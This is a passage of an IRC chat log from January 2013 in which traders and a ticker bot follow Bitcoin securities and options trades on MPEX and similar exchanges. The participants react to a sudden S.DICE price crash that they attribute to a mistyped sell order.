BTC [-] Jan 24 08:39:27 [MPEX] [S.DICE] 300 @ 0.00531943 = 1.5958 BTC [-] Jan 24 08:39:28 [MPEX] [S.DICE] 217 @ 0.00531943 = 1.1543 BTC [-] Jan 24 08:39:30 [MPEX] [S.DICE] 1619 @ 0.00531942 = 8.6121 BTC [-] Jan 24 08:39:31 [MPEX] [S.DICE] 10000 @ 0.0053 = 53 BTC [-] Jan 24 08:39:32 [MPEX] [S.DICE] 10000 @ 0.00525003 = 52.5003 BTC [-] Jan 24 08:39:33 [MPEX] [S.DICE] 15000 @ 0.00525002 = 78.7503 BTC [-] Jan 24 08:39:33 [MPEX] [S.DICE] 2350 @ 0.00523421 = 12.3004 BTC [-] Jan 24 08:39:35 [MPEX] [S.DICE] 20000 @ 0.00515 = 103 BTC [-] Jan 24 08:39:36 [MPEX] [S.DICE] 543 @ 0.0051312 = 2.7862 BTC [-] Jan 24 08:39:37 [MPEX] [S.DICE] 1000 @ 0.00513118 = 5.1312 BTC [-] Jan 24 08:39:38 [MPEX] [S.DICE] 50000 @ 0.005 = 250 BTC [-] Jan 24 08:39:39 [MPEX] [S.DICE] 2314 @ 0.004901 = 11.3409 BTC [-] Jan 24 08:39:40 [MPEX] [S.DICE] 32 @ 0.00455003 = 0.1456 BTC [-] Jan 24 08:39:41 [MPEX] [S.DICE] 1100 @ 0.00430001 = 4.73 BTC [-] Jan 24 08:39:43 [MPEX] [S.DICE] 1592 @ 0.00360676 = 5.742 BTC [-] Jan 24 08:39:44 [MPEX] [S.DICE] 1800 @ 0.00319 = 5.742 BTC [-] Jan 24 08:39:44 [MPEX] [S.DICE] 900 @ 0.00180002 = 1.62 BTC [-] Jan 24 08:39:45 [MPEX] [S.DICE] 250000 @ 0.0018 = 450 BTC [-] Jan 24 08:39:46 [MPEX] [S.DICE] 4160 @ 0.0014 = 5.824 BTC [-] Jan 24 08:39:48 [MPEX] [S.DICE] 10 @ 0.001 = 0.01 BTC [-] Jan 24 08:39:50 wow Jan 24 08:40:39 [MPEX] [O.BTCUSD.C180T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:40:41 [MPEX] [O.BTCUSD.C190T] 1000 @ 0.05560548 = 55.6055 BTC [+] Jan 24 08:40:42 [MPEX] [O.BTCUSD.C200T] 985 @ 0.05560548 = 54.7714 BTC [+] Jan 24 08:41:07 [MPEX] [S.DICE] 15000 @ 0.00085848 = 12.8772 BTC [-] Jan 24 08:44:20 what the Jan 24 08:44:33 18!? Jan 24 08:45:32 !ticker m s.dice Jan 24 08:45:34 [MPEX:S.DICE] 1D: 0.00085848 / 0.00346605 / 0.00614098 (510717 shares, 1,770.17 BTC), 7D: 0.00085848 / 0.0041628 / 0.00614098 (831795 shares, 3,462.60 BTC), 30D: 0.00085848 / 0.00413204 / 0.00614098 (10072631 shares, 41,620.58 BTC) Jan 24 08:45:44 o.o Jan 24 08:46:08 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.8659441 = 865.9441 BTC [-] Jan 24 08:46:10 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.92257877 = 922.5788 BTC [-] Jan 24 08:46:11 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.97921344 = 979.2134 BTC [-] Jan 24 08:46:55 [MPEX] [S.DICE] 4109 @ 0.00576956 = 23.7071 BTC [+] Jan 24 08:46:57 [MPEX] [S.DICE] 2500 @ 0.00587903 = 14.6976 BTC [+] Jan 24 08:46:58 [MPEX] [S.DICE] 1350 @ 0.00592581 = 7.9998 BTC [+] Jan 24 08:46:59 [MPEX] [S.DICE] 10000 @ 0.00609998 = 60.9998 BTC [+] Jan 24 08:47:00 [MPEX] [S.DICE] 4500 @ 0.00609999 = 27.45 BTC [+] Jan 24 08:47:01 [MPEX] [S.DICE] 2828 @ 0.00610559 = 17.2666 BTC [+] Jan 24 08:47:02 [MPEX] [S.DICE] 6200 @ 0.00614 = 38.068 BTC [+] Jan 24 08:47:04 [MPEX] [S.DICE] 2000 @ 0.006199 = 12.398 BTC [+] Jan 24 08:47:05 [MPEX] [S.DICE] 440 @ 0.00619997 = 2.728 BTC [+] Jan 24 08:47:06 [MPEX] [S.DICE] 10000 @ 0.00619998 = 61.9998 BTC [+] Jan 24 08:47:07 [MPEX] [S.DICE] 10000 @ 0.00619999 = 61.9999 BTC [+] Jan 24 08:47:08 [MPEX] [S.DICE] 1259 @ 0.00623784 = 7.8534 BTC [+] Jan 24 08:47:10 [MPEX] [S.DICE] 10000 @ 0.00639999 = 63.9999 BTC [+] Jan 24 08:47:10 [MPEX] [S.DICE] 20000 @ 0.00648999 = 129.7998 BTC [+] Jan 24 08:47:11 [MPEX] [S.DICE] 10000 @ 0.00649 = 64.9 BTC [+] Jan 24 08:47:12 [MPEX] [S.DICE] 10000 @ 0.00659999 = 65.9999 BTC [+] Jan 24 08:47:13 [MPEX] [S.DICE] 10000 @ 0.00679999 = 67.9999 BTC [+] Jan 24 08:47:14 [MPEX] [S.DICE] 1658 @ 0.0068 = 11.2744 BTC [+] Jan 24 08:47:15 [MPEX] [S.DICE] 8881 @ 0.00699 = 62.0782 BTC [+] Jan 24 08:47:22 wtf is this !? Jan 24 08:47:27 i have no clue Jan 24 08:47:28 Someone stop fucking... Jan 24 08:47:29 wtf Jan 24 08:47:36 jesus fuck this is like, 1000s of btc Jan 24 08:47:53 [MPEX] [S.DICE] 15000 @ 0.00085848 = 12.8772 BTC [-] Jan 24 08:48:05 for fucks sake, that's like 12% of price. Jan 24 08:48:23 and the chinese just announced they're moving the yuan on gold standard. Jan 24 08:48:55 officially? Jan 24 08:49:04 http://investmentwatchblog.com/currency-war-between-the-us-china-japan-in-process-euro-could-be-next-to-join-the-war-wgc-confirms-the-chinese-are-going-to-back-the-yuan-with-gold/ Jan 24 08:49:23 china is taking over. period. Jan 24 08:49:55 All praise our new overlords! Jan 24 08:50:27 http://live.coinbr.com/?mpsic=S.DICE jurov your graphs are broken Jan 24 08:50:28 :D Jan 24 08:50:45 Namworld i seriously would prefer a world run by china to a world run by the us. Jan 24 08:51:00 I prefer a world run by neither Jan 24 08:51:09 ya well. Jan 24 08:51:39 Hahahaha! You have not dealt much with the chinese, just wait Jan 24 08:51:49 lautaro o ? Jan 24 08:51:54 ;;ticker Jan 24 08:51:55 BTCUSD ticker | Best bid: 18.46013, Best ask: 18.58879, Bid-ask spread: 0.12866, Last trade: 18.60000, 24 hour volume: 68374.97603495, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.78022 Jan 24 08:52:11 !ticker m s.dice Jan 24 08:52:13 [MPEX:S.DICE] 1D: 0.00085848 / 0.0040434 / 0.00699 (636442 shares, 2,573.39 BTC), 7D: 0.00085848 / 0.00445507 / 0.00699 (957520 shares, 4,265.82 BTC), 30D: 0.00085848 / 0.00415986 / 0.00699 (10198356 shares, 42,423.80 BTC) Jan 24 08:52:29 that shit was insane. Jan 24 08:52:43 Could this explain the buying in S.DICE: https://www.havelockinvestments.com/ ? Jan 24 08:54:31 lautaro taht was there for a while iirc Jan 24 08:54:36 !ticker h sdice Jan 24 08:54:37 [HAVELOCK:SDICE] 1D: 0.53000000 / 0.56207879 / 0.58900000 (165 shares, 92.74300018 BTC), 7D: 0.48100000 / 0.54793774 / 0.62000000 (792 shares, 433.96668952 BTC), 30D: 0.37000000 / 0.47047986 / 0.62000000 (4336 shares, 2040.00068950 BTC) Jan 24 08:55:05 [MPEX] [S.MPOE] 13290 @ 0.00059639 = 7.926 BTC [-] Jan 24 08:55:07 [MPEX] [S.MPOE] 8610 @ 0.00059613 = 5.1327 BTC [-] Jan 24 08:55:08 [BTCTC] [RSM] 27 @ 0.009 = 0.243 BTC [+] Jan 24 08:55:10 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.8659441 = 865.9441 BTC [-] Jan 24 08:55:11 [BTCTC] [RSM] 80 @ 0.009 = 0.72 BTC [+] Jan 24 08:55:12 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.92257877 = 922.5788 BTC [-] Jan 24 08:55:13 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.97921344 = 979.2134 BTC [-] Jan 24 08:55:29 Too much trading occuring Jan 24 08:56:32 yup, mpex like 117k volume Jan 24 08:56:36 was 80s yest Jan 24 08:56:53 haha, just a few hours ago Jan 24 08:56:55 Hmm... congrats, I suppose Jan 24 08:59:58 [BTCTC] [RSM] 1 @ 0.0068 BTC [-] Jan 24 09:00:57 Now would someone be nice enough to loan me some assets on BTCT.co? Jan 24 09:01:21 [BTCTC] [RSM] 2 @ 0.0067 = 0.0134 BTC [-] Jan 24 09:02:19 ;;ticker Jan 24 09:02:20 BTCUSD ticker | Best bid: 18.49144, Best ask: 18.58700, Bid-ask spread: 0.09556, Last trade: 18.58699, 24 hour volume: 68970.80981326, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.79120 Jan 24 09:03:43 DA FUCK Jan 24 09:03:47 S.DICE Jan 24 09:03:48 hi wb. Jan 24 09:03:52 lol Jan 24 09:03:58 poor bugsy, can't sleep lol Jan 24 09:04:18 peed Jan 24 09:04:21 checked phone Jan 24 09:04:26 BOOM Jan 24 09:04:28 now I have the capital for the calls Jan 24 09:04:31 FUCKING A Jan 24 09:04:42 haha wait, you bought cheap sdice ? Jan 24 09:04:42 [MPEX] [S.MPOE] 15200 @ 0.00060197 = 9.1499 BTC [+] Jan 24 09:04:42 the stink bid strategy works again Jan 24 09:04:46 no Jan 24 09:04:50 I had asks up Jan 24 09:04:52 you sold ? a ok Jan 24 09:05:10 How many went off at .001 Jan 24 09:05:18 there were 15k at .008 Jan 24 09:05:30 snipe Jan 24 09:05:31 Someone probably reversed price and amount on that S.DICE. Wanted to sell 50000 @ 500000 for example but sold 500 000 at 50000 and ate all the bids. Jan 24 09:05:34 mother fukkker Jan 24 09:05:35 [MPEX] [S.DICE] 1800 @ 0.00319 = 5.742 BTC [-] Jan 24 09:05:35 [MPEX] [S.DICE] 900 @ 0.00180002 = 1.62 BTC [-] Jan 24 09:05:35 [MPEX] [S.DICE] 250000 @ 0.0018 = 450 BTC [-] Jan 24 09:05:35 [MPEX] [S.DICE] 4160 @ 0.0014 = 5.824 BTC [-] Jan 24 09:05:35 [MPEX] [S.DICE] 10 @ 0.001 = 0.01 BTC [-] Jan 24 09:05:35 wow Jan 24 09:05:46 yeah Jan 24 09:05:48 Namworld you think ? Jan 24 09:05:55 I'd guess so... Jan 24 09:05:57 definitey Jan 24 09:05:58 you know what this is actually possible Jan 24 09:06:02 o wow poor fucker. Jan 24 09:06:08 Same stupid shit happened on GLBSE, except almost daily. Jan 24 09:06:17 This is why I paid jurov to code the confirmation warning into pyMPEX Jan 24 09:06:25 I did the same thing 2 weeks ago Jan 24 09:06:29 money well spent Jan 24 09:06:29 but smaller scale Jan 24 09:06:34 5BTC Jan 24 09:06:43 yes Jan 24 09:06:47 now it tells me the total BTC before being sold Jan 24 09:06:48 that 450 btc ? thart's like what, 20k dollah lost Jan 24 09:06:54 I lost like 30BTC on that trade Jan 24 09:07:03 and never was able to buy back all teh shares Jan 24 09:07:26 if this is what happened someone's axing his computar right about now Jan 24 09:07:44 it is definitely what happened Jan 24 09:07:45 http://simage1.sportsmansguide.com/adimgs/l/1/190093_ts.jpg Jan 24 09:07:53 the numbers make perfect sense Jan 24 09:08:12 i guess they do Jan 24 09:08:24 !ticker m s.dice Jan 24 09:08:26 [MPEX:S.DICE] 1D: 0.00085848 / 0.0040434 / 0.00699 (636442 shares, 2,573.39 BTC), 7D: 0.00085848 / 0.00445404 / 0.00699 (956758 shares, 4,261.44 BTC), 30D: 0.00085848 / 0.00415986 / 0.00699 (10198356 shares, 42,423.80 BTC) Jan 24 09:08:29 ok Jan 24 09:08:38 not using that vwap for my current valuation Jan 24 09:08:42 Ah, and to say I removed my bids for S.DICE at around 0.0018 Jan 24 09:08:53 Bugpowder lmao why not Jan 24 09:09:07 I could have 60k S.DICE right now. At the expense of someone else, of course Jan 24 09:09:29 they sold close to the month's dividend i guess Jan 24 09:09:30 I am usaging that shit for a day Jan 24 09:09:44 hahaha Jan 24 09:09:50 "i am usaging" lmao Jan 24 09:10:27 ;;calc (0.00085848 + 0.00699) / 2 Jan 24 09:10:28 0.00392424 Jan 24 09:10:30 you could use that... Jan 24 09:10:52 i read it as "usagi-ing that shit" for a day Jan 24 09:10:59 im sure it's what he meant. Jan 24 09:11:07 60K of my shares got bot too Jan 24 09:11:58 so it went up then down? Jan 24 09:12:09 down then 20 seconds after, up Jan 24 09:12:12 down then up Jan 24 09:12:20 ;;bc,24hprc Jan 24 09:12:21 17.75 Jan 24 09:12:37 after the dump there was ~500`000 @ .00085848 for about 30 seconds Jan 24 09:12:39 Probably someone going holy fucking shit @&*$@* dumb me fuckin @$@#... Jan 24 09:12:50 :O Jan 24 09:12:58 Damn Jan 24 09:12:59 then the buy for 15`000, then the rest was pulled Jan 24 09:13:09 and then someone bought hard Jan 24 09:14:06 i couldn't hardly believe my eyes, was O.O Jan 24 09:14:24 yeah, definitly someone interchanging price and amount to sell Jan 24 09:14:33 yeah. :/ Jan 24 09:14:36 Want to sell a bit at high price, sold a lot at low price Jan 24 09:14:44 or he wanted 0.008.... Jan 24 09:14:49 make a large sell wall Jan 24 09:15:02 a small error can cost a lot when placing a trade order Jan 24 09:15:17 Biggest I made was a 50 BTC loss Jan 24 09:15:20 my better than ponzi portfolio performance continues up parabolically Jan 24 09:15:21 http://i.imgur.com/CncxaUU.png Jan 24 09:15:42 mod6 lol people be watching the tickers i guess Jan 24 09:16:07 Can I get in on that, bug? Jan 24 09:16:10 a small error can cost a lot when placing a trade order << it's the nature of the beast. talking directly into the pit, results follow Jan 24 09:16:17 2 and 10 Jan 24 09:16:21 sure Jan 24 09:16:28 Bugpowder that is totally a ponzi man. Jan 24 09:16:30 srsly now. Jan 24 09:16:36 What are you doing exactly? Jan 24 09:16:48 trading mpex Jan 24 09:16:51 he's buying s.dice at 60 and selling at 18 Jan 24 09:16:56 lol Jan 24 09:16:58 or no wait Jan 24 09:17:01 vice-versa Jan 24 09:17:09 dang, i mixed them up Jan 24 09:17:25 I'm buying S.DICE at 34 Jan 24 09:17:30 and selling at 54 Jan 24 09:17:32 o, did you miss the 32 ? Jan 24 09:17:33 and buying at 48 Jan 24 09:17:42 and selling at 69900 Jan 24 09:17:48 lol Jan 24 09:17:50 yes I was not yet with us Jan 24 09:17:56 Ok, I'll give you 1 BTC and come back next year for my 200 000 BTC Jan 24 09:17:58 did you make enough for a russian mail order bride yet ? Jan 24 09:18:15 how much do those cost? Jan 24 09:18:41 i have no idea. like a used camry ? Jan 24 09:18:47 lol Jan 24 09:18:50 so about $1200 Jan 24 09:18:58 yeah I got a whole used car lot Jan 24 09:19:00 then Jan 24 09:19:13 get one for you, one for your wife Jan 24 09:19:16 and one for the family dog Jan 24 09:19:31 I was just talking to her about this topic Jan 24 09:19:48 If I keep this up Jan 24 09:20:06 I will trade or sell coins and buy a Tesla model S Jan 24 09:20:16 and get a plate that says BTCAR Jan 24 09:20:19 ahahah Jan 24 09:20:20 or BTC CAR Jan 24 09:20:24 or BITCAR Jan 24 09:20:28 or something like that Jan 24 09:20:30 runs on lulzmoney Jan 24 09:20:33 her idea Jan 24 09:20:37 haha Jan 24 09:20:49 25k for a good one. But you can get as low as $2000, but the girl might have a pronounced Adam's apple. I recommend not being a cheapskate. Jan 24 09:20:57 best $2,000 investment evar Jan 24 09:20:57 ye see this here car ? i bought myselv this here car on internet funny money Jan 24 09:21:09 and i pay for the electricity throuygh mining for lulz Jan 24 09:21:14 Maybe Elon will trade me one for bitcoins. Jan 24 09:21:47 Namworld i dunno dood, that murmansk miner didn't sound like he'd ask for 25k Jan 24 09:22:14 27,000 short puts at 330-350?!? Jan 24 09:22:20 yeah, totally making prices up anyway Jan 24 09:22:28 that guy has enough capital to move the market Jan 24 09:22:39 yeah Jan 24 09:22:44 thats at least 60,000 BTC in deposits Jan 24 09:22:50 Bugpowder maybe its the btc he bought on gox Jan 24 09:22:55 I lost the opportunity of cheap S.DICE Jan 24 09:23:05 Because I bought 1800 calls at 17 Jan 24 09:23:12 hahhah Jan 24 09:23:17 lmao Jan 24 09:23:18 Would have loved to catch those cheap S.DICE Jan 24 09:23:29 mpex. no matter what you do, you'll regret it. Jan 24 09:23:35 the current great idea is rarely the best Jan 24 09:23:36 like willy wonka's chocolate fabriquator. Jan 24 09:23:44 Seriously though Jan 24 09:23:50 Eh, you can't have capital in escrow on everything Jan 24 09:23:55 why not ? Jan 24 09:24:15 Well you can, but only by spreading what you have available Jan 24 09:24:23 that's a point. Jan 24 09:24:28 I sunk about 450 BTC in S.BVPS Jan 24 09:24:40 and had 100 BTC left Jan 24 09:24:41 This guy buys 30,000 calls, shorts 27,000 puts 16 hours before opex Jan 24 09:24:52 I had a large order for lowball S.DICE before Jan 24 09:25:00 But I wanted CALLS Jan 24 09:25:01 Bugpowder why do you think it;s the same dood ? Jan 24 09:25:04 I think he is going to make a play to push the price Jan 24 09:25:15 ;;ticker Jan 24 09:25:15 BTCUSD ticker | Best bid: 18.34886, Best ask: 18.47000, Bid-ask spread: 0.12114, Last trade: 18.47776, 24 hour volume: 69656.34524887, 24 hour low: 16.80155, 24 hour high: 19.00000, 24 hour vwap: 17.82456 Jan 24 09:25:19 because they went off at the same time Jan 24 09:25:29 similar size Jan 24 09:25:34 rally looks well spent actually. maybe in a few hours it starts over Jan 24 09:25:35 and stopped together too Jan 24 09:25:45 no they didn't, the calls are still on the books Jan 24 09:25:47 bot ran out Jan 24 09:25:54 ah Jan 24 09:26:00 whats the total exposure? Jan 24 09:26:15 imo it's obviously two diff guys. other than very diff economics involved, one put in a calls order and left Jan 24 09:26:25 the other kept doing market orders to wipe the bot. Jan 24 09:26:27 like 60k Jan 24 09:26:33 MPEx bot ran out? Jan 24 09:26:37 well yes Jan 24 09:26:44 that explains why options are no longer sold... Jan 24 09:26:47 MPBOR of 25% Jan 24 09:26:58 it originally had 5k of any option, but then i expanded hiom to 8k Jan 24 09:27:10 Bugpowder for sure max int. Jan 24 09:27:48 and actually on the 170s Jan 24 09:28:03 check out the spread hehe 0.07060548 / 0.07286167 Jan 24 09:28:58 if he put up a simlar bid on the 160s id be tempted to cash it. Jan 24 09:29:03 but... Jan 24 09:29:11 they must know something is coming Jan 24 09:29:15 might Jan 24 09:29:19 might know Jan 24 09:29:21 i think the call buys are pure fear Jan 24 09:29:30 someone owing 10-20k btcs and having dollars. Jan 24 09:29:37 yah Jan 24 09:29:38 so they went fuck it, lose some coins, not lose the house Jan 24 09:29:39 that makes sens Jan 24 09:29:47 whereas the puts are speculative, expects price increase Jan 24 09:30:03 well I'm glad im on their team Jan 24 09:30:09 but there's no way t oexplain why he only bought the cheap ones and all of them Jan 24 09:30:15 other than because he was thinking "infinite price" Jan 24 09:30:37 really need sleep Jan 24 09:30:42 Im fucked tomorrow now Jan 24 09:30:46 go ahead and sleep Jan 24 09:30:52 it's an excellent trigger for interesting shit Jan 24 09:30:56 haha Jan 24 09:31:03 be right back in 15 minutes Jan 24 09:31:06 lol Jan 24 09:31:16 i dunnop what can happen anymore tho. Jan 24 09:31:24 maybe bbet sells out Jan 24 09:32:11 :] Jan 24 09:32:56 Well I know I'm entertained Jan 24 09:33:19 [MPEX] [S.MPOE] 20318 @ 0.00059855 = 12.1613 BTC [-] Jan 24 09:34:40 Namworld: lot of action tonight Jan 24 09:34:49 yeah Jan 24 09:35:10 I'm pissed at Amazingrando tho Jan 24 09:35:27 I could have had 770 BTC extra on orders... Jan 24 09:35:31 never trust a miner. Jan 24 09:35:39 Seems like it. Jan 24 09:35:51 [MPEX] [S.MPOE] 6518 @ 0.00059855 = 3.9013 BTC [-] Jan 24 09:36:23 Would definitly have caught lots of S.DICE Jan 24 09:52:41 [MPEX] [S.MPOE] 15000 @ 0.00059855 = 8.9783 BTC [-] Jan 24 09:56:33 strength building Jan 24 09:58:04 [MPEX] [S.MPOE] 1900 @ 0.00059867 = 1.1375 BTC [+] Jan 24 09:58:06 [MPEX] [S.MPOE] 24711 @ 0.00060197 = 14.8753 BTC [+] Jan 24 09:58:08 [MPEX] [S.MPOE] 13800 @ 0.00060365 = 8.3304 BTC [+] Jan 24 09:58:08 [MPEX] [S.MPOE] 2764 @ 0.00060395 = 1.6693 BTC [+] Jan 24 09:58:13 [MPEX] [S.MPOE] 10994 @ 0.00060696 = 6.6729 BTC [+] Jan 24 10:17:02 [MPEX] [S.MPOE] 18250 @ 0.00059907 = 10.933 BTC [-] Jan 24 10:20:07 [MPEX] [S.MPOE] 3869 @ 0.00060412 = 2.3373 BTC [+] Jan 24 10:20:08 [MPEX] [S.MPOE] 5832 @ 0.00059855 = 3.4907 BTC [-] Jan 24 10:22:17 [MPEX] [S.MPOE] 2606 @ 0.00060696 = 1.5817 BTC [+] Jan 24 10:22:19 [MPEX] [S.MPOE] 12044 @ 0.00060961 = 7.3421 BTC [+] Jan 24 10:28:46 [MPEX] [S.MPOE] 2822 @ 0.00060786 = 1.7154 BTC [-] Jan 24 10:36:46 [MPEX] [S.MPOE] 11348 @ 0.00060961 = 6.9179 BTC [+] Jan 24 10:41:49 http://trilema.com/2013/marketplace-excitement-with-expert-commentary-for-your-vicarious-trading-pleasure/ Jan 24 10:41:53 earlier chatlog if anyone's curious. Jan 24 10:51:05 [HAVELOCK] [SDICE] 8 @ 0.56000001 = 4.48 BTC [-] Jan 24 11:00:18 [MPEX] [S.MPOE] 1158 @ 0.00060961 = 0.7059 BTC [+] Jan 24 11:00:19 [MPEX] [S.MPOE] 4325 @ 0.00061136 = 2.6441 BTC [+] Jan 24 11:11:00 crazy morning :) Jan 24 11:12:03 [MPEX] [S.MPOE] 1128 @ 0.00060786 = 0.6857 BTC [-] Jan 24 11:12:05 [MPEX] [S.MPOE] 7600 @ 0.00060676 = 4.6114 BTC [-] Jan 24 11:12:07 [MPEX] [S.MPOE] 5632 @ 0.00059855 = 3.371 BTC [-] Jan 24 11:12:08 [MPEX] [S.MPOE] 6440 @ 0.00059805 = 3.8514 BTC [-] Jan 24 11:15:09 [MPEX] [S.MPOE] 12900 @ 0.00061136 = 7.8865 BTC [+] Jan 24 11:15:36 *he Jan 24 11:18:43 [MPEX] [S.MPOE] 8610 @ 0.00059805 = 5.1492 BTC [-] Jan 24 11:18:45 [MPEX] [S.MPOE] 7818 @ 0.00059686 = 4.6663 BTC [-] Jan 24 11:23:09 :p Jan 24 11:23:18 3 horus, half million dollah traded. Jan 24 11:23:41 on mpex Jan 24 11:23:49 add another mn or two on mtgox... pretty hefty. Jan 24 11:24:30 I saw, are we heading up with the arrival of asics "confirmed", or will it spike with the actual delivery? Jan 24 11:30:21 [BTCTC] [GSDPT] 1 @ 0.0061 BTC [+] Jan 24 11:37:16 [MPEX] [S.MPOE] 12783 @ 0.00061136 = 7.815 BTC [+] Jan 24 11:37:18 [MPEX] [S.MPOE] 1017 @ 0.00061137 = 0.6218 BTC [+] Jan 24 11:39:31 [MPEX] [S.MPOE] 12600 @ 0.00060731 = 7.6521 BTC [-] Jan 24 11:52:02 [MPEX] [S.MPOE] 8705 @ 0.00060687 = 5.2828 BTC [-] Jan 24 11:52:16 [BTCTC] [ESECURITYSABTC] 1 @ 0.7469 BTC [+] Jan 24 11:52:27 [BTCTC] [ESECURITYSABTC] 1 @ 0.747 BTC [+] Jan 24 11:54:00 [MPEX] [S.MPOE] 5750 @ 0.00061137 = 3.5154 BTC [+] Jan 24 11:56:54 [MPEX] [S.MPOE] 4450 @ 0.00061137 = 2.7206 BTC [+] Jan 24 12:01:12 [MPEX] [S.MPOE] 4104 @ 0.0006069 = 2.4907 BTC [-] Jan 24 12:01:13 [MPEX] [S.MPOE] 7050 @ 0.00060579 = 4.2708 BTC [-] Jan 24 12:02:25 [MPEX] [S.DICE] 600 @ 0.0061225 = 3.6735 BTC [-] Jan 24 12:02:43 [BTCTC] [ESECURITYSABTC] 1 @ 0.76 BTC [+] Jan 24 12:04:13 [MPEX] [S.MPOE] 3703 @ 0.00060292 = 2.2326 BTC [-] Jan 24 12:05:14 [MPEX] [S.MPOE] 10353 @ 0.00061137 = 6.3295 BTC [+] Jan 24 12:05:16 [MPEX] [S.MPOE] 13133 @ 0.00061148 = 8.0306 BTC [+] Jan 24 12:05:17 [MPEX] [S.MPOE] 2214 @ 0.00061155 = 1.354 BTC [+] Jan 24 12:12:23 [MPEX] [S.DICE] 400 @ 0.0061 = 2.44 BTC [-] Jan 24 12:12:24 [MPEX] [S.DICE] 2000 @ 0.0062 = 12.4 BTC [+] Jan 24 12:23:39 [MPEX] [S.MPOE] 1586 @ 0.00061155 = 0.9699 BTC [+] Jan 24 12:23:41 [MPEX] [S.MPOE] 24 @ 0.0006117 = 0.0147 BTC [+] Jan 24 12:23:42 [MPEX] [S.MPOE] 19390 @ 0.00061269 = 11.8801 BTC [+] Jan 24 12:57:46 are people running away from mpex? Jan 24 13:04:44 [MPEX] [S.MPOE] 8949 @ 0.0006138 = 5.4929 BTC [+] Jan 24 13:04:46 [MPEX] [S.MPOE] 4173 @ 0.00061461 = 2.5648 BTC [+] Jan 24 13:21:46 [MPEX] [S.MPOE] 1177 @ 0.00061461 = 0.7234 BTC [+] Jan 24 13:21:47 [MPEX] [S.MPOE] 14996 @ 0.00061857 = 9.2761 BTC [+] Jan 24 13:21:49 [MPEX] [S.MPOE] 8427 @ 0.00061947 = 5.2203 BTC [+] Jan 24 13:27:05 [MPEX] [S.MPOE] 7200 @ 0.00061947 = 4.4602 BTC [+] Jan 24 13:28:42 mornin Jan 24 13:29:32 first i was liek "fine mircea added C350Ts" Jan 24 13:29:45 then as i read further.... O.o Jan 24 13:31:48 why not add 400, 450 & 500 preemptively? at least for next month :D Jan 24 13:33:25 azx: no, just cashing out of s.mpoe Jan 24 13:36:09 [MPEX] [S.MPOE] 12255 @ 0.00061939 = 7.5906 BTC [-] Jan 24 13:59:56 [MPEX] [S.MPOE] 1823 @ 0.00061947 = 1.1293 BTC [+] Jan 24 13:59:58 [MPEX] [S.MPOE] 12250 @ 0.00061961 = 7.5902 BTC [+] Jan 24 13:59:59 [MPEX] [S.MPOE] 3513 @ 0.00061987 = 2.1776 BTC [+] Jan 24 14:00:01 [MPEX] [S.MPOE] 12214 @ 0.00062104 = 7.5854 BTC [+] Jan 24 14:00:02 [MPEX] [S.MPOE] 6888 @ 0.00062123 = 4.279 BTC [+] Jan 24 14:00:03 [MPEX] [S.MPOE] 5000 @ 0.00062148 = 3.1074 BTC [+] Jan 24 14:00:05 [MPEX] [S.MPOE] 14700 @ 0.00062149 = 9.1359 BTC [+] Jan 24 14:00:06 [MPEX] [S.MPOE] 62 @ 0.00062217 = 0.0386 BTC [+] Jan 24 14:04:39 [MPEX] [S.DICE] 219 @ 0.00629498 = 1.3786 BTC [+] Jan 24 14:12:43 ;;ticker Jan 24 14:12:43 BTCUSD ticker | Best bid: 18.44022, Best ask: 18.47841, Bid-ask spread: 0.03819, Last trade: 18.44022, 24 hour volume: 75519.29148676, 24 hour low: 17.05000, 24 hour high: 19.00000, 24 hour vwap: 17.99835 Jan 24 14:12:51 ;;bc,24hpric Jan 24 14:12:51 Error: "bc,24hpric" is not a valid command. Jan 24 14:12:54 ;;bc,24hprc Jan 24 14:12:58 17.97 Jan 24 14:13:15 ;;bc,vwap Jan 24 14:13:16 Error: "bc,vwap" is not a valid command. Jan 24 14:33:06 [HAVELOCK] [SDICE] 1 @ 0.588 BTC [+] Jan 24 14:35:24 [MPEX] [S.MPOE] 5874 @ 0.00061939 = 3.6383 BTC [-] Jan 24 14:37:53 [MPEX] [S.DICE] 410 @ 0.00629498 = 2.5809 BTC [+] Jan 24 14:37:55 [MPEX] [S.DICE] 1650 @ 0.00633755 = 10.457 BTC [+] Jan 24 14:37:56 [MPEX] [S.DICE] 1234 @ 0.00633881 = 7.8221 BTC [+] Jan 24 14:42:48 [MPEX] [S.MPOE] 10338 @ 0.00062217 = 6.432 BTC [+] Jan 24 14:42:50 [MPEX] [S.MPOE] 11540 @ 0.00062241 = 7.1826 BTC [+] Jan 24 14:52:14 lol bitstamp http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Jan 24 14:59:06 [HAVELOCK] [SDICE] 11 @ 0.588 = 6.468 BTC [+] Jan 24 15:00:07 [HAVELOCK] [SDICE] 10 @ 0.58889999 = 5.889 BTC [+] Jan 24 15:04:06 [HAVELOCK] [SDICE] 10 @ 0.589 = 5.89 BTC [+] Jan 24 15:06:58 [MPEX] [S.MPOE] 17060 @ 0.00062241 = 10.6183 BTC [+] Jan 24 15:07:06 [MPEX] [S.MPOE] 9140 @ 0.00062318 = 5.6959 BTC [+] Jan 24 15:09:16 [MPEX] [S.MPOE] 3175 @ 0.00062318 = 1.9786 BTC [+] Jan 24 15:09:18 [MPEX] [S.MPOE] 3575 @ 0.00062348 = 2.2289 BTC [+] Jan 24 15:10:20 ;;bc,24hprc Jan 24 15:10:22 18.00 Jan 24 15:13:06 allo allo Jan 24 15:14:07 [MPEX] [S.MPOE] 10125 @ 0.00062348 = 6.3127 BTC [+] Jan 24 15:14:08 [MPEX] [S.MPOE] 3286 @ 0.00062361 = 2.0492 BTC [+] Jan 24 15:15:45 ;;asks 40 Jan 24 15:15:47 There are currently 44128.376 bitcoins offered at or under 40.0 USD, worth 1010511.53039 USD in total. Jan 24 15:16:02 ;;ticker Jan 24 15:16:02 BTCUSD ticker | Best bid: 18.48000, Best ask: 18.50000, Bid-ask spread: 0.02000, Last trade: 18.50000, 24 hour volume: 76763.96484102, 24 hour low: 17.10004, 24 hour high: 19.00000, 24 hour vwap: 18.01526 Jan 24 15:17:12 [MPEX] 